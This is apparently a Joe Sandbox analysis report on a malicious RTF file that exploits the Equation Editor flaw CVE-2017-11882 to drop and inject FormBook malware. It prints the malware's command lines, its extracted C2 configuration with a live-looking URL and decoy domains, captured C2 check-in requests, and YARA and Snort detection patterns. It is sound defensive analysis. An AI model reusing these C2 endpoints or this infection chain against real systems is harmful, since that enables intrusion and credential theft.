Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
Analysis ID:680528
MD5:8bfea104ae681494896379e3c647f6ae
SHA1:aaf97d8a987c5060ff06c4031030000d53d3cb31
SHA256:2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
Tags:rtf
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Document contains OLE streams with names of living off the land binaries
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
PE file contains section with special chars
Sample uses process hollowing technique
Office process drops PE file
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3000 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 3060 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2708 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 316 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: B4F00BB75BFD5C4E2C9D0CD6070E8E54)
        • notepad.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • ipconfig.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
              • cmd.exe (PID: 1740 cmdline: /c del "C:\Windows\SysWOW64\notepad.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0x1799:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x16fd:$m1: 4d5a90000300000004000000ffff
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1283:$obj2: \objdata
  • 0x1dc298:$obj2: \objdata
  • 0x2bc8ae:$obj3: \objupdate
  • 0x8e8:$obj4: \objemb
  • 0x1db8fd:$obj4: \objemb

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0xebc00:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xebc21:$font: 0A 01 08 5A 5A
  • 0xebc52:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xebb00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xebc29:$exe: .exe
  • 0xebc3d:$exe: .exe
  • 0xebc52:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 54 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.0.notepad.exe.400000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.notepad.exe.400000.3.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        9.0.notepad.exe.400000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.notepad.exe.400000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        9.0.notepad.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 47 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.2266.235.200.17049171802031449 08/08/22-18:39:45.738853
          SID:2031449
          Source Port:49171
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22104.167.67.17549172802031449 08/08/22-18:40:04.832440
          SID:2031449
          Source Port:49172
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2266.235.200.17049171802031453 08/08/22-18:39:45.738853
          SID:2031453
          Source Port:49171
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22104.167.67.17549172802031453 08/08/22-18:40:04.832440
          SID:2031453
          Source Port:49172
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2266.235.200.17049171802031412 08/08/22-18:39:45.738853
          SID:2031412
          Source Port:49171
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22104.167.67.17549172802031412 08/08/22-18:40:04.832440
          SID:2031412
          Source Port:49172
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: www.lundadonate.xyz/nb30/Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfVirustotal: Detection: 43%Perma Link
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtfReversingLabs: Detection: 21%
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeReversingLabs: Detection: 24%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeJoe Sandbox ML: detected
          Source: 9.0.notepad.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

          Exploits

          barindex
          Found potential equation exploit (CVE-2017-11882)
          Source: Static RTF information: Object: 1 Offset: 001DC2BCh
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.drStream path '_1721489049/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Document exploit detected (drops PE files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: Client.exe.0.drJump to dropped file
          Document exploit detected (creates forbidden files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
          Source: global trafficTCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
          Source: global trafficDNS query: name: www.thegoldencamel.online
          Source: global trafficDNS query: name: www.best-boy.net
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\notepad.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.best-boy.net
          Source: C:\Windows\explorer.exeNetwork Connect: 104.167.67.175 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.170 80
          Source: C:\Windows\explorer.exeDomain query: www.thegoldencamel.online
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.lundadonate.xyz/nb30/
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: ESITEDUS ESITEDUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
